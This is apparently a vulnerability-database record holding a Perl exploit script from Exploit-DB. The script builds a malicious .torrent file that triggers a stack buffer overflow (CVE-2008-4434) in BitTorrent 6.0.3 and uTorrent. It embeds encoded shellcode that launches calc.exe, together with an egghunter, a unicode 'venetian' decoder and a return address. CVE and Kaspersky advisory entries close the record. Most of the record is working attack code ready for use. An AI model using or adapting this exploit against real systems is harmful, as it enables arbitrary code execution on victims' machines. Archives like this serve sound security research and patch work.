BitTorrent 6.0.3 - .torrent Stack Buffer Overflow Exploit

{"bulletinFamily": "exploit", "id": "EDB-ID:6787", "cvelist": ["CVE-2008-4434"], "modified": "2008-10-19T00:00:00", "lastseen": "2016-02-01T00:39:29", "edition": 1, "sourceData": "#!/usr/bin/perl\n# BitTorrent 6.0.3 .torrent File Stack Buffer Overflow Exploit\n# 09/21/2008 by k`sOSe && oVeret\n\nuse warnings;\nuse strict;\n\n# If you change this(avoid \\x80->\\x9f unless you really know what you are doing) you must also change the length value of the decoder\nmy $shellcode = \n# windows/exec CMD=\"C:\\WINDOWS\\system32\\calc.exe\" \n#[*] x86/alpha_mixed succeeded, final size 337 \n\"\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\\x49\" .\n\"\\x49\\x49\\x49\\x37\\x51\\x5a\\x6a\\x41\\x58\\x50\\x30\\x41\\x30\\x41\" .\n\"\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42\\x30\\x42\\x42\\x41\" .\n\"\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4a\\x49\\x4b\\x4c\\x4b\\x58\\x51\" .\n\"\\x54\\x43\\x30\\x45\\x50\\x45\\x50\\x4c\\x4b\\x51\\x55\\x47\\x4c\\x4c\" .\n\"\\x4b\\x43\\x4c\\x45\\x55\\x44\\x38\\x43\\x31\\x4a\\x4f\\x4c\\x4b\\x50\" .\n\"\\x4f\\x42\\x38\\x4c\\x4b\\x51\\x4f\\x47\\x50\\x43\\x31\\x4a\\x4b\\x51\" .\n\"\\x59\\x4c\\x4b\\x50\\x34\\x4c\\x4b\\x43\\x31\\x4a\\x4e\\x46\\x51\\x49\" .\n\"\\x50\\x4a\\x39\\x4e\\x4c\\x4b\\x34\\x49\\x50\\x42\\x54\\x43\\x37\\x49\" .\n\"\\x51\\x48\\x4a\\x44\\x4d\\x45\\x51\\x48\\x42\\x4a\\x4b\\x4c\\x34\\x47\" .\n\"\\x4b\\x50\\x54\\x47\\x54\\x43\\x34\\x43\\x45\\x4d\\x35\\x4c\\x4b\\x51\" .\n\"\\x4f\\x51\\x34\\x45\\x51\\x4a\\x4b\\x42\\x46\\x4c\\x4b\\x44\\x4c\\x50\" .\n\"\\x4b\\x4c\\x4b\\x51\\x4f\\x45\\x4c\\x43\\x31\\x4a\\x4b\\x4c\\x4b\\x45\" .\n\"\\x4c\\x4c\\x4b\\x45\\x51\\x4a\\x4b\\x4d\\x59\\x51\\x4c\\x46\\x44\\x45\" .\n\"\\x54\\x48\\x43\\x51\\x4f\\x46\\x51\\x4b\\x46\\x45\\x30\\x46\\x36\\x45\" .\n\"\\x34\\x4c\\x4b\\x47\\x36\\x50\\x30\\x4c\\x4b\\x51\\x50\\x44\\x4c\\x4c\" .\n\"\\x4b\\x44\\x30\\x45\\x4c\\x4e\\x4d\\x4c\\x4b\\x45\\x38\\x45\\x58\\x4d\" .\n\"\\x59\\x4b\\x48\\x4d\\x53\\x49\\x50\\x42\\x4a\\x50\\x50\\x45\\x38\\x4a\" .\n\"\\x50\\x4c\\x4a\\x43\\x34\\x51\\x4f\\x45\\x38\\x4c\\x58\\x4b\\x4e\\x4c\" .\n\"\\x4a\\x44\\x4e\\x50\\x57\\x4b\\x4f\\x4a\\x47\\x50\\x43\\x46\\x5a\\x51\" .\n\"\\x4c\\x46\\x37\\x50\\x49\\x50\\x4e\\x51\\x54\\x50\\x4f\\x50\\x57\\x50\" .\n\"\\x53\\x51\\x4c\\x42\\x53\\x43\\x49\\x44\\x33\\x44\\x34\\x45\\x35\\x42\" .\n\"\\x4d\\x50\\x33\\x46\\x52\\x51\\x4c\\x42\\x43\\x43\\x51\\x42\\x4c\\x45\" .\n\"\\x33\\x46\\x4e\\x43\\x55\\x42\\x58\\x42\\x45\\x43\\x30\\x44\\x4a\\x41\" .\n\"\\x41\";\n\n$shellcode .= \"\\x87\\x87\"; # -> \\x21\\x20\\x21\\x20 -> EGG ( for english windows version )\n\nmy $ret\t= \"\\x3f\\x41\"; # -> unicode friendly pop,pop,ret\n\n# unicode friendly get_EIP (needed by the venetian decoder)\nsub get_eip\n{\n\t#0041 00 ADD BYTE PTR DS:[ECX],AL\n\t#5F POP EDI\n\t#0041 00 ADD BYTE PTR DS:[ECX],AL\n\t#5F POP EDI\n\t#0041 00 ADD BYTE PTR DS:[ECX],AL\n\t#6A 00 PUSH 0\n\t#58 POP EAX\n\t#0041 00 ADD BYTE PTR DS:[ECX],AL\n\t#57 PUSH EDI\n\t#0041 00 ADD BYTE PTR DS:[ECX],AL\n\t#54 PUSH ESP\n\t#0041 00 ADD BYTE PTR DS:[ECX],AL\n\t#5A POP EDX\n\t#0042 00 ADD BYTE PTR DS:[EDX],AL\n\t#40 INC EAX\n\t#0042 00 ADD BYTE PTR DS:[EDX],AL\n\t#40 INC EAX\n\t#0042 00 ADD BYTE PTR DS:[EDX],AL\n\t#40 INC EAX\n\t#0042 00 ADD BYTE PTR DS:[EDX],AL\n\t#40 INC EAX\n\t#0042 00 ADD BYTE PTR DS:[EDX],AL\n\t#40 INC EAX\n\t#0042 00 ADD BYTE PTR DS:[EDX],AL\n\t#40 INC EAX\n\t#0042 00 ADD BYTE PTR DS:[EDX],AL\n\t#40 INC EAX\n\t#0042 00 ADD BYTE PTR DS:[EDX],AL\n\t#40 INC EAX\n\t#0042 00 ADD BYTE PTR DS:[EDX],AL\n\t#40 INC EAX\n\t#0042 00 ADD BYTE PTR DS:[EDX],AL\n\t#40 INC EAX\n\t#0042 00 ADD BYTE PTR DS:[EDX],AL\n\t#40 INC EAX\n\t#0042 00 ADD BYTE PTR DS:[EDX],AL\n\t#40 INC EAX\n\t#0042 00 ADD BYTE PTR DS:[EDX],AL\n\t#43 INC EBX\n\t#0042 00 ADD BYTE PTR DS:[EDX],AL\n\t#58 POP EAX\n\t#0041 00 ADD BYTE PTR DS:[ECX],AL\n\t\"\\x5f\\x41\\x5f\\x41\\x6a\\x58\\x41\\x57\\x41\\x54\\x41\\x5a\" . \"\\x42\\x40\" x 12 . \"\\x42\\x43\" . \"\\x42\\x58\\x41\";\n}\n\n\nsub egghunter\n{\n\t#6A01\t\tPUSH 1\n\t#5E\t\tPOP ESI\n\t#4E\t\tDEC ESI (=0)\n\t#6A72\t\tPUSH 72\t\t\t\t<- starts from 0x00720000\n\t#56\t\tPUSH ESI\n\t#4C\t\tDEC ESP\n\t#4C\t\tDEC ESP\n\t#5E\t\tPOP ESI\n\t#5E\t\tPOP ESI\t\t\t\t<- ESI == 0x00720000\n\t#BA21202120\t/MOV EDX,20212021\t\t<- egg\n\t#46\t\t|INC ESI\n\t#3B16\t\t|CMP EDX,DWORD PTR DS:[ESI]\n\t#75FB\t\t\\JNZ SHORT egghunter\n\t\"\\x6A\\x01\\x5E\\x4E\\x6A\\x72\\x56\\x4C\\x4C\\x5E\\x5E\\xBA\\x21\\x20\\x21\\x20\\x46\\x3B\\x16\\x75\\xFB\";\n}\n\n# this will decode the unicode expanded shellcode pushing it to the stack and the execute it\nsub decoder\n{\n\t#46\t\tINC ESI\n\t#6A01\t\tPUSH 1\n\t#6801010155\tPUSH 0x55010101\n\t#4C\t\tDEC ESP\n\t#5B\t\tPOP EBX\n\t#5B\t\tPOP EBX\n\t#AD\t\t/LODS DWORD PTR DS:[ESI]\n\t#50\t\t|PUSH EAX\n\t#44\t\t|INC ESP\n\t#44\t\t|INC ESP\n\t#44\t\t|INC ESP\n\t#4E\t\t|DEC ESI\n\t#4E\t\t|DEC ESI\n\t#4E\t\t|DEC ESI\n\t#4E\t\t|DEC ESI\n\t#4E\t\t|DEC ESI\n\t#4E\t\t|DEC ESI\n\t#4B\t\t|DEC EBX\n\t#83FB01\t\t|CMP EBX,1\n\t#75EF\t\t\\JNE SHORT decoder\n\t#54\t\tPUSH ESP\n\t#59\t\tPOP ECX\n\t#4C\t\tDEC ESP\t\t-> realign\n\t#51\t\tPUSH ECX\n\t#C3\t\tRET\n\"\\x46\\x6A\\x01\\x68\\x01\\x01\\x01\\x55\\x4C\\x5B\\x5B\\xAD\\x50\\x44\\x44\\x44\\x4E\\x4E\\x4E\\x4E\\x4E\\x4E\\x4B\\x83\\xFB\\x01\\x75\\xEF\\x54\\x59\\x4c\\x51\\xc3\";\n}\n\n# venetian deccoder + venetian encoded egghunter and decoder\nsub venetian_decoder\n{\n\"\\x05\\x03\\x01\\x71\\x2D\\x01\\x01\\x71\\x40\\x71\\xC6\\x01\\x71\\x40\\x71\\x40\".\n\"\\x71\\xC6\\x4E\\x71\\x40\\x71\\x40\\x71\\xC6\\x72\\x71\\x40\\x71\\x40\\x71\\xC6\".\n\"\\x4C\\x71\\x40\\x71\\x40\\x71\\xC6\\x5E\\x71\\x40\\x71\\x40\\x71\\xC6\\xBA\\x71\".\n\"\\x40\\x71\\x40\\x71\\xC6\\x20\\x71\\x40\\x71\\x40\\x71\\xC6\\x20\\x71\\x40\\x71\".\n\"\\x40\\x71\\xC6\\x3B\\x71\\x40\\x71\\x40\\x71\\xC6\\x75\\x71\\x40\\x71\\x40\\x71\".\n\"\\xC6\\x46\\x71\\x40\\x71\\x40\\x71\\xC6\\x01\\x71\\x40\\x71\\x40\\x71\\xC6\\x01\".\n\"\\x71\\x40\\x71\\x40\\x71\\xC6\\x01\\x71\\x40\\x71\\x40\\x71\\xC6\\x4C\\x71\\x40\".\n\"\\x71\\x40\\x71\\xC6\\x5B\\x71\\x40\\x71\\x40\\x71\\xC6\\x50\\x71\\x40\\x71\\x40\".\n\"\\x71\\xC6\\x44\\x71\\x40\\x71\\x40\\x71\\xC6\\x4E\\x71\\x40\\x71\\x40\\x71\\xC6\".\n\"\\x4E\\x71\\x40\\x71\\x40\\x71\\xC6\\x4E\\x71\\x40\\x71\\x40\\x71\\xC6\\x4B\\x71\".\n\"\\x40\\x71\\xFE\\xFE\\x40\\x71\\xC6\\xFB\\x71\\x40\\x71\\x40\\x71\\xC6\\x75\\x71\".\n\"\\x40\\x71\\x40\\x71\\xC6\\x54\\x71\\x40\\x71\\x40\\x71\\xC6\\x4C\\x71\\x40\\x71\".\n\"\\x40\\x71\\xC6\\xC3\\x71\\x40\\x71\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\".\n\"\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\".\n\"\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\".\n\"\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\\x04\".\n\"\\x6A\\x5E\\x6A\\x56\\x4C\\x5E\\x21\\x21\\x46\\x16\\xFB\\x6A\\x68\\x01\\x55\\x5B\".\n\"\\xAD\\x44\\x44\\x4E\\x4E\\x4E\\x81\\x01\\xEF\\x59\\x51\";\n}\n\nmy $stack_buffer\t= $ret x 192 . get_eip() . venetian_decoder();\n\nopen(HANDLE, \"> torrent.torrent\") || die \"Error!\\n\\n\";\nprint HANDLE\t\"d8:announce17:http://qwerty.qwe7:comment\" \t. \n\t\tlength($shellcode) .\":\" \t\t\t. \n\t\t$shellcode .\n\t\t\"10:created by\" \t\t\t\t.\n\t\tlength($stack_buffer) . \":\"\t\t\t.\n\t\t$stack_buffer\t\t\t\t\t.\n\t\t\"13:creation datei1218555046e8:encoding10:iso-8859-14:infod6:lengthi1e4:name6:bu.txt12:piece lengthi65536e6:pieces20:\".\t\n\t\t\"\\x86\\xf7\\xe4\\x37\\xfa\\xa5\\xa7\\xfc\\xe1\\x5d\\x1d\\xdc\\xb9\\xea\\xea\\xea\\x37\\x76\\x67\\xb8\\x65\\x65\\x0a\";\nclose (HANDLE);\n\n# milw0rm.com [2008-10-19]\n", "published": "2008-10-19T00:00:00", "href": "https://www.exploit-db.com/exploits/6787/", "osvdbidlist": ["47585"], "reporter": "Guido Landi", "hash": "39a185444e8c2313e3cdd197d5b9e73f55fec08bd153df5e10c3fb7fc0b6bfce", "title": "BitTorrent 6.0.3 - .torrent Stack Buffer Overflow Exploit", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "BitTorrent 6.0.3 .torrent File Stack Buffer Overflow Exploit. CVE-2008-4434. Local exploit for windows platform", "references": [], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/6787/", "viewCount": 1, "enchantments": {"vulnersScore": 6.5}}

{"result": {"cve": [{"id": "CVE-2008-4434", "type": "cve", "title": "CVE-2008-4434", "description": "Stack-based buffer overflow in (1) uTorrent 1.7.7 build 8179 and earlier and (2) BitTorrent 6.0.3 build 8642 and earlier allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long Created By field in a .torrent file.", "published": "2008-10-03T18:22:45", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4434", "cvelist": ["CVE-2008-4434"], "lastseen": "2016-09-03T11:07:52"}], "kaspersky": [{"id": "KLA10089", "type": "kaspersky", "title": "\r KLA10089\nDoS vulnerability in Torrent\t\t\t ", "description": "### *CVSS*:\n9.3\n\n### *Detect date*:\n10/03/2008\n\n### *Severity*:\nCritical\n\n### *Description*:\nA buffer overflow was found in the BitTorrent & UTorrent. By exploiting this vulnerability malicious users can cause denial of service and possibly execute arbitrary code. This vulnerability can be exploited remotely via a specially designed .torrent file.\n\n### *Affected products*:\nBitTorrent versions 6.0.3 build 8642 and earlier \nUTorrent versions 1.7.7 build 8179 and earlier\n\n### *Solution*:\nUpdate to latest version\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[uTorrent](<https://threats.kaspersky.com/en/product/uTorrent-2/>)\n\n### *CVE-IDS*:\n[CVE-2008-4434](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4434>)", "published": "2008-10-03T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://threats.kaspersky.com/en/vulnerability/KLA10089", "cvelist": ["CVE-2008-4434"], "lastseen": "2017-05-01T09:33:22"}]}}